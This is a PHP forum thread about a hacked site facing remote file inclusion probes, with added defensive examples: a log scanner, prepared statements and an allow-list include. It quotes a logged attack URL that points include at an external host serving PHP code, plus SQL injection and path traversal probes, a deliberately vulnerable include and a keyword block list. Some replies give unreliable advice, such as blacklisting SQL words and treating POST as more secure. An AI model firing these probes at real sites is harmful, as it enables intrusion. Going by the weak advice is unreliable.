
I recently had my site hacked and managed to clear it all up. I have been checking my logs and another attempt is being made on my site using injection via the URL. They are visiting my site using things like:

 

http://mysite.com//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://test.bigshop.cz/uploaded/two??

 

If you look at http://test.bigshop.cz/uploaded/two?? and view the source you can see their php code.

 

Is there anything I can do to stop them even trying?
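An added example, not code from the thread: a small PHP scanner that flags, in access-log lines, the two things visible in the request quoted above: a parameter whose value is a URL or stream wrapper (a remote file inclusion probe) and a parameter named after a superglobal (register_globals poisoning). The log lines are constructed; the `mosConfig_absolute_path` and `page` parameter names come from this thread.

```php
<?php
declare(strict_types=1);
// Added example, not code from the thread. Scans combined-format access log lines for
// URL-valued query parameters (remote file inclusion probes) and for query parameters
// named after PHP superglobals (register_globals poisoning). Log lines are constructed.

$logSample = <<<'LOG'
203.0.113.5 - - [10/Jan/2010:10:01:02 +0000] "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Jan/2010:10:01:07 +0000] "GET //index.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 312
203.0.113.9 - - [10/Jan/2010:10:01:09 +0000] "GET /index.php?page=http%3A%2F%2Fexample.net%2Fx.txt%3F HTTP/1.1" 200 312
198.51.100.2 - - [10/Jan/2010:10:02:00 +0000] "GET /about.php?pg=contact HTTP/1.1" 200 2048
LOG;

/** One finding per suspicious parameter: ['ip', 'reason', 'param', 'value']. */
function find_inclusion_probes(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;                      // not a request line we understand
        }
        [, $ip, $target] = $m;
        $qpos = strpos($target, '?');
        if ($qpos === false) {
            continue;                      // no query string, nothing to inspect
        }
        parse_str(substr($target, $qpos + 1), $params);   // URL-decodes, builds a[b]=c arrays
        foreach ($params as $name => $value) {
            $name = (string) $name;
            if (preg_match('/^(GLOBALS|_(GET|POST|REQUEST|SERVER|COOKIE|SESSION|FILES|ENV))$/', $name)) {
                $findings[] = ['ip' => $ip, 'reason' => 'superglobal-in-query', 'param' => $name, 'value' => $value];
            }
            // Only one level of a[b]=c nesting is inspected here.
            foreach (is_array($value) ? $value : [$value] as $leaf) {
                if (is_string($leaf) && preg_match('#^(https?|ftp|php|data)://#i', $leaf)) {
                    $findings[] = ['ip' => $ip, 'reason' => 'url-valued-param', 'param' => $name, 'value' => $leaf];
                }
            }
        }
    }
    return $findings;
}

foreach (find_inclusion_probes($logSample) as $f) {
    printf("%-13s %-21s %s=%s\n", $f['ip'], $f['reason'], $f['param'],
           json_encode($f['value'], JSON_UNESCAPED_SLASHES));
}
```

Run it against a real log by replacing `$logSample` with the file contents; the second and third constructed lines are the ones it reports.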

https://forums.phpfreaks.com/topic/189419-stopping-a-hack-attempt-quickly/

After my last successful hack, I disabled allow_url_include. I want to disable allow_url_fopen as well just to be safe, but I use file_get_contents on one part of a page. Is there a way I can just enable it for that script and disable it immediately after?

this will ban MOST BUT NOT ALL proxies

 

<?php

// Reject requests that carry common proxy headers or no User-Agent at all.
// empty() is used so that a missing header does not raise a notice.
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])
    || empty($_SERVER['HTTP_USER_AGENT'])
    || !empty($_SERVER['HTTP_VIA'])) {
    die("Proxy servers not allowed.");
}

$proxy_headers = array(
    'HTTP_VIA',
    'HTTP_X_FORWARDED_FOR',
    'HTTP_FORWARDED_FOR',
    'HTTP_X_FORWARDED',
    'HTTP_FORWARDED',
    'HTTP_CLIENT_IP',
    'HTTP_FORWARDED_FOR_IP',
    'VIA',
    'X_FORWARDED_FOR',
    'FORWARDED_FOR',
    'X_FORWARDED',
    'FORWARDED',
    'CLIENT_IP',
    'FORWARDED_FOR_IP',
    'HTTP_PROXY_CONNECTION'
);
foreach ($proxy_headers as $x) {
    // Only stop when a listed header is actually present
    // (the original had an unconditional exit here, which ended every request).
    if (isset($_SERVER[$x])) {
        die("You are using a proxy.");
    }
}

?>

 

this will stop him from flooding ur site:

 

<?php

if (session_status() === PHP_SESSION_NONE) {
    session_start();
}
// anti flood protection
// isset() guards the very first request of a session, where the key does not exist yet
if (isset($_SESSION['last_session_request'])
    && $_SESSION['last_session_request'] > time() - 2) {
    // users will be redirected to this page if they make requests faster than every 2 seconds
    header("Location: /flood.html");
    exit;
}
$_SESSION['last_session_request'] = time();

?>

 

this will stop him from injection sql:

 

<?php
    // eregi() was removed in PHP 7; preg_match() does the same test here.
    function anti_injection( $user, $pass ) {
           // We'll first get rid of any special characters using a simple regex statement.
           // After that, we'll get rid of any SQL command words using a string replacement.
            $banlist = array (
                    "insert", "select", "update", "delete", "distinct", "having", "truncate", "replace",
                    "handler", "like", " as ", "or ", "procedure", "limit", "order by", "group by", "asc", "desc"
            );
            // ---------------------------------------------
            if ( preg_match ( "/[a-zA-Z0-9]+/", $user ) ) {
                    $user = trim ( str_replace ( $banlist, '', strtolower ( $user ) ) );
            } else {
                    $user = null;
            }
            // ---------------------------------------------
            // Now to make sure the given password is an alphanumerical string
            // devoid of any special characters. strtolower() is being used
            // because unfortunately, str_ireplace() only works with PHP5.
            if ( preg_match ( "/[a-zA-Z0-9]+/", $pass ) ) {
                    $pass = trim ( str_replace ( $banlist, '', strtolower ( $pass ) ) );
            } else {
                    $pass = null;
            }
            // ---------------------------------------------
            // Now to make an array so we can dump these variables into the SQL query.
            // If either user or pass is NULL (because of inclusion of illegal characters),
            // the whole script will stop dead in its tracks.
            $array = array ( 'user' => $user, 'pass' => $pass );
            // ---------------------------------------------
            if ( in_array ( null, $array ) ) {
                    die ( 'Invalid use of login and/or password. Please use a normal method.' );
            } else {
                    return $array;
            }
    }
?>

 

this will filter alpha numeric characters:

 

<?php

// Begin filtering variable $data of non alphanumeric characters

$data = preg_replace("/[^0-9a-zA-Z]/", '', $data);

// Finish filtering of non alphanumeric characters

?>

if your index doesnt need $_GET you can also do something like

<?php

// $_GET is a superglobal and is always set, so test for it being non-empty instead.
if (!empty($_GET)) {

// do whatever maybe return server error 500 contact admin and mimic a server problem so they get bored, redirect to the fbi website for fun or whatever creative thing you can do

//if you want you can ban each ip and put it on a blacklist or just simply die();

}

?>
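An added example, not code from the thread, for the anti_injection() snippet above: the keyword blacklist both mangles legitimate values and is not what prevents injection; binding the value in a prepared statement is. The vulnerable concatenated query sits beside the bound one. It uses an in-memory SQLite database (pdo_sqlite) so it runs stand-alone; the table and rows are constructed.

```php
<?php
declare(strict_types=1);
// Added example, not code from the thread. Contrasts the keyword blacklist with a
// prepared statement. Uses an in-memory SQLite database (pdo_sqlite); the users
// table and its rows are constructed for the demonstration.

const BANLIST = ["insert", "select", "update", "delete", "distinct", "having", "truncate", "replace",
                 "handler", "like", " as ", "or ", "procedure", "limit", "order by", "group by", "asc", "desc"];

/** The thread's blacklist step, applied to one value. */
function strip_keywords(string $value): string
{
    return trim(str_replace(BANLIST, '', strtolower($value)));
}

/** Vulnerable: the name is spliced into the SQL text. Shown for contrast only. */
function find_user_unsafe(PDO $db, string $name): ?string
{
    $row = $db->query("SELECT name FROM users WHERE name = '" . $name . "'")->fetchColumn();
    return $row === false ? null : $row;
}

/** Hardened: the name travels as a bound parameter and cannot change the query's shape. */
function find_user(PDO $db, string $name): ?string
{
    $stmt = $db->prepare('SELECT name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    $row = $stmt->fetchColumn();
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (name TEXT NOT NULL)');
$db->exec("INSERT INTO users (name) VALUES ('selector'), ('alice')");

// The blacklist damages a real user name: the "select" inside "selector" is removed.
printf("strip_keywords('selector') = '%s'\n", strip_keywords('selector'));

$probe = "' OR 1=1 --";
// Concatenation: the SQL comment swallows the closing quote and a row comes back.
var_dump(find_user_unsafe($db, $probe));
// Binding: the same text is compared literally to the column and matches nothing.
var_dump(find_user($db, $probe));
var_dump(find_user($db, 'alice'));
```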

I'm assuming that a hacker doing these url type exploits is hoping to come across (with luck) an:

 

if(isset($_GET['hack'])){
    //something
}

sort of thing where they have site.com?hack=http://hackerscode.txt

I noticed a lot of the attempts were using ?page=something or ?pg=something etc...

 

I still have no idea how they managed to succeed the last time. But they managed to plant a couple of php files that wrote new code to my index file.
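An added example, not code from the thread: the "?page=" pattern the post above guesses at, in its vulnerable shape next to a fixed one that maps the parameter onto an allow-list of local files. The page names and the temporary page files are constructed.

```php
<?php
declare(strict_types=1);
// Added example, not code from the thread: a "?page=" include in its vulnerable
// shape and in a fixed one. Page files are constructed in a temp directory.

/** Vulnerable: the request chooses the file. With allow_url_include on, a value like
 *  http://host/two?? makes include() fetch and run remote code (the trailing ?? pushes
 *  the appended ".php" into that URL's query string); with it off, ../ paths still
 *  read local files. Shown for contrast only and never called here. */
function render_page_unsafe(string $page): void
{
    include $page . '.php';
}

/** Fixed: the request only selects a key from an allow-list; the path is built by us. */
function resolve_page(string $page, string $pagesDir): string
{
    $allowed = ['home', 'contact'];
    if (!in_array($page, $allowed, true)) {
        $page = 'home';                  // or send a 404; never echo the raw value back
    }
    return $pagesDir . '/' . $page . '.php';
}

// Constructed pages so the fixed version can actually be run.
$pagesDir = sys_get_temp_dir() . '/pages_' . bin2hex(random_bytes(4));
mkdir($pagesDir);
file_put_contents($pagesDir . '/home.php', "<?php echo \"[home]\\n\";\n");
file_put_contents($pagesDir . '/contact.php', "<?php echo \"[contact]\\n\";\n");

foreach (['contact', 'http://test.bigshop.cz/uploaded/two??', '../../../../etc/passwd'] as $req) {
    $file = resolve_page($req, $pagesDir);
    printf("%-42s -> %s\n", $req, basename($file));
    include $file;
}
```

Both hostile values fall through to home.php; nothing outside the allow-list is ever handed to include().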


Then they were using a proposed exploit scanner, and succeeded on one level. I added the site to MALZILLA/safebrowsing repo for update, sooner or later it will go through, but you should really fix the code or at least show us the request that performed the malicious behaviour. Your site is obviously not secure.

 

use anti flood protection. use alphanumeric characters fix. DONT allow ur form to use GET. GET shows the user ur variables. use POST instead :)

 

Mhmm.. POST is not any more secure than GET.

 

at least it wont show variables.... -.-

 

<form action="page.php" method="post"> <!-- or method="get" -->
   <input type="text" name="baz"/>
</form>

 

Would you prefer to get the variable 'baz' from $_POST['baz'] or $_GET['baz']? In other words, you're wrong.
